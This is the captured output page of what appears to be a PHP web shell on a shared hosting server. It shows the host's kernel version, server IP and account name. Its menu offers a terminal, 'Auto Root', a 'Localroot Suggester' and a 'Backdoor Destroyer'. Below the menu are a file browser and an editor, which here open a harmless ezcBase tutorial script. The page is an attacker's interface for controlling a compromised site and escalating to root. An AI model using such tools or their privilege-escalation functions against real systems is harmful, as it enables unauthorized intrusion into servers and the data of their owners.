Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php55 /
usr /
share /
doc /
pear /
Base /
docs /
Delete
Unzip
Name
Size
Permission
Date
Action
repos
[ DIR ]
drwxr-xr-x
2021-12-16 09:19
CREDITS
229
B
-rw-r--r--
2015-01-23 23:16
LICENSE
1.53
KB
-rw-r--r--
2015-01-23 23:16
tutorial.txt
8.59
KB
-rw-r--r--
2015-01-23 23:16
tutorial_autoload.php
495
B
-rw-r--r--
2015-01-23 23:16
tutorial_example_01.php
215
B
-rw-r--r--
2015-01-23 23:16
tutorial_example_02.php
189
B
-rw-r--r--
2015-01-23 23:16
tutorial_example_03.php
107
B
-rw-r--r--
2015-01-23 23:16
tutorial_example_04.php
1.39
KB
-rw-r--r--
2015-01-23 23:16
tutorial_lazy_initialization.php
914
B
-rw-r--r--
2015-01-23 23:16
Save
Rename
<?php require_once 'tutorial_autoload.php'; ezcBase::addClassRepository( './repos', './repos/autoloads' ); $myVar1 = new erMyClass2(); $myVar1->toString(); $yourVar1 = new erYourClass1(); $yourVar1->toString(); ?>